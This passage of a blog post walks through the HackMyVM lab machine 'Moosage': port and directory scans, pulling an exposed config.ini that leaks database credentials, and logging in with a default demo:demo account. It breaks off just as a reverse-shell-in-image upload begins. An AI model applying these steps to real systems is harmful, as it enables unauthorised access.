{"id":880,"date":"2025-06-17T00:42:11","date_gmt":"2025-06-16T16:42:11","guid":{"rendered":"http:\/\/162.14.82.114\/?p=880"},"modified":"2025-06-17T00:42:11","modified_gmt":"2025-06-16T16:42:11","slug":"hmv-_-moosage","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/880\/06\/17\/2025\/","title":{"rendered":"hmv[-_-]Moosage"},"content":{"rendered":"<h1>Moosage<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040117.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616175406533\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616220926337\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nYou miss 100% of the ports you don&#039;t scan. - RustScan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.106:22\nOpen 192.168.10.106:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 02:65:e6:05:af:c8:81:9c:30:b0:da:e3:1e:d8:be:02 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDv+qPYyD6jIW9PZIAMgz4ojpJlvs2EWCtw4GyIHiX3\/UMJ0qISwj04rljLXmmvTALNi9GYKPDlnh7vrAKbnKhIhef114wHFrPjTMNI7m+nEqvN0yuxGmS6oIHkzz5sNXvxSnVRfqqpFheZqXmY5qrrcSV+TgFKEZs94WzZFp7yzyDX4AnU+Mp7AMrZzYEtDqLFJBviK27rTZ9RJqmH9VTiHENSr0+UHTLPKVxnKCdPuAXLmbd167bQsMdoQ5\/Rn7RgUbwjF8hSpgrRvJ9pAuLrNIEGe1zeeVoZTZmpn8yvjVKDNV2qOh69mf+uam9r\/KrDqr1b7QGiRnIBXryAUBwv\n|   256 3f:7d:4b:86:8d:c7:01:8f:b3:56:6d:65:c2:e5:cf:4e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNW4D2ORbPVJ9OINylplX0ks+ihYcAng5XYoc1anWtC9jJstK9F01AivJdESyyEPmA+qnN9\/uPnhS8aXYirauwc=\n|   256 8e:d4:b8:d6:8e:d9:61:a1:3e:7f:5e:d7:ec:dc:bb:de (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAlNJzSVpE+7Dt7rN2EgYoqsw+pS9EhnA9x9L\/iwHVH\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-title: 403 Forbidden\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:97:77:DD (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog =&gt; http:\/\/192.168.10.106\/blog\/\n403      GET        7l       10w      169c http:\/\/192.168.10.106\/\n200      GET      508l     1672w    18089c 
http:\/\/192.168.10.106\/blog\/static\/scripts\/lightbox.js\n200      GET        4l     1292w    86351c http:\/\/192.168.10.106\/blog\/static\/scripts\/jquery.min.js\n200      GET       10l       27w     1404c http:\/\/192.168.10.106\/blog\/static\/images\/profile.jpg\n200      GET       14l       61w     3142c http:\/\/192.168.10.106\/blog\/static\/images\/profile_big.jpg\n200      GET        4l       10w      438c http:\/\/192.168.10.106\/blog\/static\/images\/zpEYXu5Wdu6.png\n200      GET       44l     3937w   100276c http:\/\/192.168.10.106\/blog\/static\/scripts\/highlight-10.1.2.min.js\n200      GET      213l      403w     3891c http:\/\/192.168.10.106\/blog\/static\/styles\/lightbox.css\n200      GET      292l      921w     7770c http:\/\/192.168.10.106\/blog\/static\/scripts\/autosize.js\n200      GET       83l      105w     1026c http:\/\/192.168.10.106\/blog\/static\/styles\/highlight-monokai-sublime.css\n200      GET      140l      288w     2330c http:\/\/192.168.10.106\/blog\/static\/styles\/main.css\n200      GET      198l      440w     4317c http:\/\/192.168.10.106\/blog\/static\/scripts\/datepick.js\n200      GET     1293l     2393w    23974c http:\/\/192.168.10.106\/blog\/static\/styles\/theme02.css\n200      GET     1102l     2150w    25882c http:\/\/192.168.10.106\/blog\/static\/scripts\/app.js\n200      GET      268l      683w    10091c http:\/\/192.168.10.106\/blog\/index.php\n403      GET        7l       10w      169c http:\/\/192.168.10.106\/blog\/static\/styles\/\n403      GET        7l       10w      169c http:\/\/192.168.10.106\/blog\/static\/images\/\n403      GET        7l       10w      169c http:\/\/192.168.10.106\/blog\/static\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/static\/images =&gt; http:\/\/192.168.10.106\/blog\/static\/images\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/data =&gt; http:\/\/192.168.10.106\/blog\/data\/\n200      GET        0l        0w        0c 
http:\/\/192.168.10.106\/blog\/common.php\n403      GET        7l       10w      169c http:\/\/192.168.10.106\/blog\/static\/scripts\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/static =&gt; http:\/\/192.168.10.106\/blog\/static\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/static\/scripts =&gt; http:\/\/192.168.10.106\/blog\/static\/scripts\/\n200      GET        1l        3w       47c http:\/\/192.168.10.106\/blog\/ajax.php\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/app =&gt; http:\/\/192.168.10.106\/blog\/app\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/app\/db =&gt; http:\/\/192.168.10.106\/blog\/app\/db\/\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/static\/styles =&gt; http:\/\/192.168.10.106\/blog\/static\/styles\/\n200      GET        2l        4w       25c http:\/\/192.168.10.106\/blog\/robots.txt\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/app\/lang =&gt; http:\/\/192.168.10.106\/blog\/app\/lang\/\n200      GET      674l     5644w    35149c http:\/\/192.168.10.106\/blog\/LICENSE\n301      GET        7l       12w      185c http:\/\/192.168.10.106\/blog\/app\/db\/mysql =&gt; http:\/\/192.168.10.106\/blog\/app\/db\/mysql\/<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040120.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616221408401\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616223648669\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl http:\/\/192.168.10.106\/blog\/robots.txt                \nUser-agent: *\nDisallow: \/ \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ whatweb http:\/\/$IP\/blog\nhttp:\/\/192.168.10.106\/blog [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx\/1.14.2], IP[192.168.10.106], RedirectLocation[http:\/\/192.168.10.106\/blog\/], Title[301 Moved Permanently], nginx[1.14.2]\nhttp:\/\/192.168.10.106\/blog\/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx\/1.14.2], HttpOnly[PHPSESSID], IP[192.168.10.106], JQuery, Lightbox, PasswordField[password], Script, Title[Blog], X-UA-Compatible[IE=edge], nginx[1.14.2]<\/code><\/pre>\n<p>Check whether this blog is some open-source blog project:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616221646089\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>Open-Source Information Gathering<\/h3>\n<p>Hmm, these all seem to be personal homepages... I looked to see whether it was among them, and then found it: <a href=\"https:\/\/github.com\/m1k1o\/blog\">https:\/\/github.com\/m1k1o\/blog<\/a><\/p>\n<p>Comparing it with the information-gathering results, it is basically the same. Look at the default username and password to see whether there is anything exploitable:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ tree .\/blog\/\n.\/blog\/\n\u251c\u2500\u2500 ajax.php\n\u251c\u2500\u2500 app\n\u2502   \u251c\u2500\u2500 ajax.class.php\n\u2502   \u251c\u2500\u2500 config.class.php\n\u2502   \u251c\u2500\u2500 db\n\u2502   \u2502   \u251c\u2500\u2500 mysql\n\u2502   \u2502   \u2502   \u2514\u2500\u2500 01_schema.sql\n\u2502   \u2502   \u251c\u2500\u2500 postgres\n\u2502   \u2502   \u2502   \u2514\u2500\u2500 01_schema.sql\n\u2502   \u2502   \u2514\u2500\u2500 sqlite\n\u2502   \u2502       \u2514\u2500\u2500 01_schema.sql\n\u2502   \u251c\u2500\u2500 
db.class.php\n\u2502   \u251c\u2500\u2500 image.class.php\n\u2502   \u251c\u2500\u2500 jbbcode\n\u2502   \u2502   \u251c\u2500\u2500 codedefinitionbuilder.class.php\n\u2502   \u2502   \u251c\u2500\u2500 codedefinition.class.php\n\u2502   \u2502   \u251c\u2500\u2500 codedefinitionset.class.php\n\u2502   \u2502   \u251c\u2500\u2500 defaultcodedefinitionset.class.php\n\u2502   \u2502   \u251c\u2500\u2500 documentelement.class.php\n\u2502   \u2502   \u251c\u2500\u2500 elementnode.class.php\n\u2502   \u2502   \u251c\u2500\u2500 inputvalidator.class.php\n\u2502   \u2502   \u251c\u2500\u2500 node.class.php\n\u2502   \u2502   \u251c\u2500\u2500 nodevisitor.class.php\n\u2502   \u2502   \u251c\u2500\u2500 parser.class.php\n\u2502   \u2502   \u251c\u2500\u2500 parserexception.class.php\n\u2502   \u2502   \u251c\u2500\u2500 textnode.class.php\n\u2502   \u2502   \u251c\u2500\u2500 tokenizer.class.php\n\u2502   \u2502   \u251c\u2500\u2500 validators\n\u2502   \u2502   \u2502   \u251c\u2500\u2500 csscolorvalidator.class.php\n\u2502   \u2502   \u2502   \u2514\u2500\u2500 urlvalidator.class.php\n\u2502   \u2502   \u2514\u2500\u2500 visitors\n\u2502   \u2502       \u2514\u2500\u2500 nestlimitvisitor.class.php\n\u2502   \u251c\u2500\u2500 lang\n\u2502   \u2502   \u251c\u2500\u2500 bs.ini\n\u2502   \u2502   \u251c\u2500\u2500 cz.ini\n\u2502   \u2502   \u251c\u2500\u2500 de.ini\n\u2502   \u2502   \u251c\u2500\u2500 en.ini\n\u2502   \u2502   \u251c\u2500\u2500 es.ini\n\u2502   \u2502   \u251c\u2500\u2500 fr.ini\n\u2502   \u2502   \u251c\u2500\u2500 nl.ini\n\u2502   \u2502   \u251c\u2500\u2500 ru.ini\n\u2502   \u2502   \u251c\u2500\u2500 sk.ini\n\u2502   \u2502   \u2514\u2500\u2500 zh.ini\n\u2502   \u251c\u2500\u2500 lang.class.php\n\u2502   \u251c\u2500\u2500 log.class.php\n\u2502   \u251c\u2500\u2500 post.class.php\n\u2502   \u251c\u2500\u2500 splclassloader.class.php\n\u2502   \u2514\u2500\u2500 user.class.php\n\u251c\u2500\u2500 common.php\n\u251c\u2500\u2500 
config.ini\n\u251c\u2500\u2500 data\n\u251c\u2500\u2500 docker-compose.yml\n\u251c\u2500\u2500 Dockerfile\n\u251c\u2500\u2500 favicon.ico\n\u251c\u2500\u2500 index.php\n\u251c\u2500\u2500 LICENSE\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 robots.txt\n\u2514\u2500\u2500 static\n    \u251c\u2500\u2500 images\n    \u2502   \u251c\u2500\u2500 bNvHN6v1NeH.png\n    \u2502   \u251c\u2500\u2500 close.png\n    \u2502   \u251c\u2500\u2500 JNPO3NqYHEj.png\n    \u2502   \u251c\u2500\u2500 loading.gif\n    \u2502   \u251c\u2500\u2500 next.png\n    \u2502   \u251c\u2500\u2500 prev.png\n    \u2502   \u251c\u2500\u2500 profile_big.jpg\n    \u2502   \u251c\u2500\u2500 profile.jpg\n    \u2502   \u251c\u2500\u2500 QijIVO3ZIrO.png\n    \u2502   \u251c\u2500\u2500 star.png\n    \u2502   \u251c\u2500\u2500 theme01\n    \u2502   \u2502   \u251c\u2500\u2500 7W9WiMukPsP.png\n    \u2502   \u2502   \u251c\u2500\u2500 B89i4luGsIu.png\n    \u2502   \u2502   \u251c\u2500\u2500 CAGlHC-HRGh.png\n    \u2502   \u2502   \u251c\u2500\u2500 Jid5DW8pIwZ.png\n    \u2502   \u2502   \u251c\u2500\u2500 opUxrh_sBcu.png\n    \u2502   \u2502   \u251c\u2500\u2500 pkJbsArvXFu.png\n    \u2502   \u2502   \u251c\u2500\u2500 tools.png\n    \u2502   \u2502   \u251c\u2500\u2500 W9Z74j1GbH2.png\n    \u2502   \u2502   \u251c\u2500\u2500 wKDzFUeiPd3.png\n    \u2502   \u2502   \u2514\u2500\u2500 y_KJ3X1mNCs.png\n    \u2502   \u251c\u2500\u2500 theme02\n    \u2502   \u2502   \u251c\u2500\u2500 2CGkY1_Ax_-.png\n    \u2502   \u2502   \u251c\u2500\u2500 38mmIT7r0jG.png\n    \u2502   \u2502   \u251c\u2500\u2500 7wYk0RRj5-g.png\n    \u2502   \u2502   \u251c\u2500\u2500 7_Yye-V3r9M.png\n    \u2502   \u2502   \u251c\u2500\u2500 amepTQ7nV0z.png\n    \u2502   \u2502   \u251c\u2500\u2500 BOCzaD2rwOa.png\n    \u2502   \u2502   \u251c\u2500\u2500 BvwOjzIAV9T.png\n    \u2502   \u2502   \u251c\u2500\u2500 gc6VwTsu2qZ.png\n    \u2502   \u2502   \u251c\u2500\u2500 HxCo9uaZIcB.png\n    \u2502   \u2502   \u251c\u2500\u2500 
IBOXrWGhcIu.png\n    \u2502   \u2502   \u251c\u2500\u2500 jcKElmriUSj.png\n    \u2502   \u2502   \u251c\u2500\u2500 kOtcUC5Tvlq.png\n    \u2502   \u2502   \u251c\u2500\u2500 LiJKvoYFmUK.png\n    \u2502   \u2502   \u251c\u2500\u2500 mHY-L01FIF0.png\n    \u2502   \u2502   \u251c\u2500\u2500 qZPl7lx7zY1.png\n    \u2502   \u2502   \u251c\u2500\u2500 THYN1-y3aPS.png\n    \u2502   \u2502   \u251c\u2500\u2500 W5IvJHzSLg7.png\n    \u2502   \u2502   \u251c\u2500\u2500 Xe-tUjaQ4vo.png\n    \u2502   \u2502   \u251c\u2500\u2500 xGM66u5seRO.png\n    \u2502   \u2502   \u2514\u2500\u2500 YFO-fzIJZ2K.png\n    \u2502   \u251c\u2500\u2500 trophy.png\n    \u2502   \u251c\u2500\u2500 UgNUNkKQar6.png\n    \u2502   \u2514\u2500\u2500 zpEYXu5Wdu6.png\n    \u251c\u2500\u2500 screenshot-theme01.png\n    \u251c\u2500\u2500 screenshot-theme02-dark.png\n    \u251c\u2500\u2500 screenshot-theme02-light.png\n    \u251c\u2500\u2500 scripts\n    \u2502   \u251c\u2500\u2500 app.js\n    \u2502   \u251c\u2500\u2500 autosize.js\n    \u2502   \u251c\u2500\u2500 datepick.js\n    \u2502   \u251c\u2500\u2500 highlight-10.1.2.min.js\n    \u2502   \u251c\u2500\u2500 jquery.min.js\n    \u2502   \u2514\u2500\u2500 lightbox.js\n    \u2514\u2500\u2500 styles\n        \u251c\u2500\u2500 highlight-monokai-sublime.css\n        \u251c\u2500\u2500 lightbox.css\n        \u251c\u2500\u2500 main.css\n        \u251c\u2500\u2500 theme01.css\n        \u2514\u2500\u2500 theme02.css\n\n17 directories, 105 files<\/code><\/pre>\n<p>First, look at the configuration file:<\/p>\n<pre><code class=\"language-php\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini                                        \n[database]\ndb_connection = sqlite\n;sqlite_db = data\/sqlite.db\n\n;[database]\n;db_connection = mysql\n;mysql_socket = \/tmp\/mysql.sock\n;mysql_host = localhost\n;mysql_port = 3306\n;mysql_user = root\n;mysql_pass = root\n;db_name = blog\n\n;[database]\n;db_connection 
= postgres\n;postgres_socket = \/tmp\/postgres.sock\n;postgres_host = localhost\n;postgres_port = 5432\n;postgres_user = root\n;postgres_pass = root\n;db_name = blog\n\n[profile]\ntitle = Blog\nname = Max Musermann\npic_small = static\/images\/profile.jpg\npic_big = static\/images\/profile_big.jpg\n;cover = static\/images\/cover.jpg\n\n[language]\nlang = en\n\n[components]\nhighlight = true\n\n[custom]\ntheme = theme02\n;header = data\/header.html\n;styles[] = static\/styles\/custom1.css\n;styles[] = static\/styles\/custom2.css\n;scripts = static\/styles\/scripts.css\n;footer = &quot;Edit this if you really want to remove my backlink :(&quot;\n\n[bbcode]\n;bbtags[quote] = &quot;&lt;quote&gt;{param}&lt;\/quote&gt;&quot;\n\n[admin]                            # Login is forced, and a test account with username demo and password demo is preset\nforce_login = true\nnick = demo\npass = demo\n\n[friends]\n;friends[user] = pass\n;friends[user] = pass\n\n[directories]\nimages_path = data\/i\/\nthumbnails_path = data\/t\/\nlogs_path = data\/logs\/\n\n[proxy]\n;proxy = hostname:port\n;proxyauth = username:password\n;proxytype = CURLPROXY_HTTP ; default, if not set\n;proxytype = CURLPROXY_SOCKS4\n;proxytype = CURLPROXY_SOCKS5\n\n;URL_PREFIX type:\n;proxy = http:\/\/your.page.com\/proxy.cgi?\n;proxyauth = username:password\n;proxytype = URL_PREFIX\n\n[system]\n;timezone = Europe\/Vienna\nversion = 1.42\ndebug = false\nlogs = false<\/code><\/pre>\n<p>The configuration contains user-related settings, so check what the target machine&#039;s copy contains:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ cat blog\/config.ini &gt; config1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ curl -s http:\/\/$IP\/blog\/config.ini &gt; config2                      
\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Moosage]\n\u2514\u2500$ diff config1 config2                \n6,21c6,12\n&lt; ;db_connection = mysql\n&lt; ;mysql_socket = \/tmp\/mysql.sock\n&lt; ;mysql_host = localhost\n&lt; ;mysql_port = 3306\n&lt; ;mysql_user = root\n&lt; ;mysql_pass = root\n&lt; ;db_name = blog\n&lt; \n&lt; ;[database]\n&lt; ;db_connection = postgres\n&lt; ;postgres_socket = \/tmp\/postgres.sock\n&lt; ;postgres_host = localhost\n&lt; ;postgres_port = 5432\n&lt; ;postgres_user = root\n&lt; ;postgres_pass = root\n&lt; ;db_name = blog\n---\n> db_connection = mysql\n> mysql_socket = \/run\/mysqld\/mysqld.sock\n> mysql_host = localhost\n> mysql_port = 3306\n> mysql_user = baca\n> mysql_pass = youareinsane\n> db_name = moosage\n42d32\n&lt; ;footer = &quot;Edit this if you really want to remove my backlink :(&quot;\n75c65,66\n&lt; version = 1.42\n---\n> system_name = blog\n> version = 1.3<\/code><\/pre>\n<p>The version differs, and there is a database credential: <code>baca:youareinsane<\/code>. I checked whether it was reused for SSH, but that did not succeed. Note that in the configuration file <strong>login is forced, and a test account with username <code>demo<\/code> and password <code>demo<\/code> is preset<\/strong>, so try logging in with <code>demo:demo<\/code>.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040123.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040123.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616223715722\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Logged in successfully!<\/p>\n<h3>Reverse Shell Hidden in an Image (Including Trial and Error)<\/h3>\n<p><strong>(Some trial and error follows; don&#039;t copy it step by step and waste your time)<\/strong><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040124.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040124.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616223834176\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>The post editor allows image uploads, so upload any image to see what happens!<\/p>\n<blockquote>\n<p><strong>PS: Remember to change the mode to Public!!!<\/strong><\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040125.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040125.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250616223942077\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>The link address turns out to be:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.106\/blog\/data\/i\/13x5.jpg<\/code><\/pre>\n<p>Try uploading a reverse shell!!!!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506170040126.png'><img class=\"lazyload lazyload-style-2\" 